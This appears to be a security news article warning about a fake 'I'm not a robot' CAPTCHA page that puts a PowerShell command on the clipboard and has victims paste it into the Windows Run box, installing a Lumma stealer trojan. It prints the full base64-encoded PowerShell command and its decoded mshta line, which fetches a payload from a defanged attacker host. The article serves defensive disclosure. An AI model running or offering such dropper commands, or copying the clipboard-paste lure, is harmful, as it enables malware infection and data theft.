The Hackerdose team discovered a cybersecurity threat that takes advantage of users' trust in CAPTCHA verification processes.
A fake CAPTCHA webpage, antibotx.b-cdn[.]net/captcha-verify.html, tricks users into running a malicious PowerShell script that downloads and executes malware.
The attack exploits the popular “I'm not a robot” CAPTCHA, causing users to unintentionally compromise their systems by running a malicious command.
The attack method is particularly insidious because it requires user interaction and relies on built-in Windows features.
As the command is executed directly through the user's operating system, traditional antivirus programs have a more difficult time detecting the malicious behavior.
How it works
The attack begins when a user visits an unsafe website, which most likely contain unsafe third-party advertisements.
These advertisements may redirect users to a malicious CAPTCHA page. The fake CAPTCHA appears legitimate and includes a “I'm not a robot” button, which is common on many websites that require human verification.
However, by clicking this button, the webpage secretly copies a PowerShell command to the user's clipboard.
The next stage of the attack begins when the fake CAPTCHA prompts the user to open the Run command by pressing Windows + R.
The user is then instructed to paste the clipboard content (which has already been replaced by the malicious command) and hit Enter.
This action triggers the execution of a PowerShell command, which eventually downloads and runs a malicious file called trans08.exe.
The command copied to the user's clipboard is a base64-encoded string that hides the malicious instruction.
powershell.exe -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYwBsAGkAYwBrAHQAbwBnAG8ALgBjAGwAaQBjAGsALwBkAG8AdwBuAGwAbwBhAGQAcwAvAHQAcgBhADAAOAAiAA==
This command appears deceptive because the string is encoded in Base64, a technique that converts binary data into readable text for easier transmission.
The Base64-encoded string hides the following real command:
mshta "https://clicktogo[.]click/downloads/tra08"
The mshta utility is used to run Microsoft HTML Applications (HTA), but in this case, it is being abused to download malware.
It is to be said that the aforementioned file is a Trojan Horse, which allows attackers to take control of the infected machine or steal sensitive data from the user's system.
Once downloaded, the trans08.exe file behaves like a Trojan Horse, attempting to reconnect to its command-and-control (C2) server and carry out additional malicious actions.
The malicious software also uses a deceiving technique by impersonating Microsoft Corporation as its developer name.
However, during the analysis, it was discovered that the malware can detect whether it is operating in a controlled environment, such as a malware sandbox or a virtual machine.
If such an environment is detected, the malware refuses to execute or reconnect to the server, thereby avoiding detection by security researchers.
In addition, the executable does not appear to be compatible with older versions of Windows.
It does not run on systems running Windows 7 or earlier, returning an error stating that the application is not a valid Win32 application.
This suggests that the malware is targeting more modern systems, which could increase its effectiveness on unpatched or less secure newer Windows versions.
Update: We confirmed, along with other sources, that the threat dropped by the malicious code is a Lumma stealer variant, a malicious infostealer malware written in C.
Comparison to other CAPTCHA scams
This new type of attack differs significantly from the more common CAPTCHA-related scams.
Fake CAPTCHA pages are commonly used to trick users into accepting unwanted browser push notifications, which then bombard their systems with advertisements or phishing links.
However, this scam goes a step further by tricking users into running a PowerShell command that downloads and installs malware on their computers.
The use of PowerShell and clipboard manipulation in this attack exemplifies a more sophisticated technique that heavily relies on social engineering.
Unlike traditional malware distribution methods such as email attachments or drive-by downloads, this approach requires active user participation, making automated detection more difficult.
For those who may have run the malicious code on their systems, we have developed step-by-step removal instructions to show you how to remove the malware.